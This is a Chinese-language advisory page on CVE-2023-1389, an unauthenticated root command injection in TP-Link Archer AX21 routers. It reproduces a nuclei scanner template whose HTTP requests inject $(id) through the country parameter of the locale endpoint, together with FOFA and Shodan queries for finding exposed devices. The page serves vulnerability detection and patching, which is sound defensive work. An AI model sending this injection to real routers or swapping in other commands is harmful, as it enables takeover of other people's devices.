TP-Link Archer AX21 (AX1800) 未经认证的命令注入漏洞

漏洞信息

漏洞名称: TP-Link Archer AX21 (AX1800) 未经认证的命令注入漏洞

漏洞编号:

  • CVE: CVE-2023-1389

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: TP-Link Archer AX21 (AX1800)路由器是一款广泛使用的家用及小型办公网络设备,提供高速无线网络连接和多种网络管理功能。该设备因其性价比高和易于部署而受到广泛欢迎。该漏洞存在于设备的locale端点中,攻击者可以通过country参数进行未经认证的操作系统命令注入。这一漏洞的技术根源在于对用户输入的不当处理,导致攻击者能够注入并执行任意命令,且这些命令将以root权限执行。由于漏洞允许远程攻击者在无需任何认证的情况下执行命令,因此其潜在的安全风险极高。攻击者可以利用此漏洞完全控制受影响的设备,执行任意代码,窃取敏感信息,或进一步渗透网络。此外,由于漏洞的利用不需要用户交互,且存在公开的利用代码,使得该漏洞极易被自动化攻击工具利用,增加了其危害性。

产品厂商: tp-link

产品名称: TP-Link Archer AX21 (AX1800)

搜索语法: body=”tp-link”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/31a16ad7492514641ad877822e333a59c2bd1e83/http%2Fcves%2F2023%2FCVE-2023-1389.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

id: CVE-2023-1389

info:
name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
author: ritikchaddha
severity: critical
description: |
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
remediation: |
Update to the latest firmware version provided by TP-Link.
reference:
- https://www.tenable.com/security/research/tra-2023-11
- https://nvd.nist.gov/vuln/detail/CVE-2023-1389
- https://github.com/tenable/poc-cve-2023-1389
classification:
cve-id: CVE-2023-1389
cwe-id: CWE-78
epss-score: 0.94022
epss-percentile: 0.99883
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
max-request: 1
vendor: tp-link
product: archer-ax21
fofa-query: body="tp-link"
shodan-query: 'title:"TP-Link Router"'
verified: true
tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev

http:
- raw:
- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

operation=write&country=$(id)

- |
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

operation=write&country=$(id)

matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

- type: status
status:
- 200



TP-Link Archer AX21 (AX1800) 未经认证的命令注入漏洞
http://example.com/2025/07/15/github_3986307870/
作者
lianccc
发布于
2025年7月15日
许可协议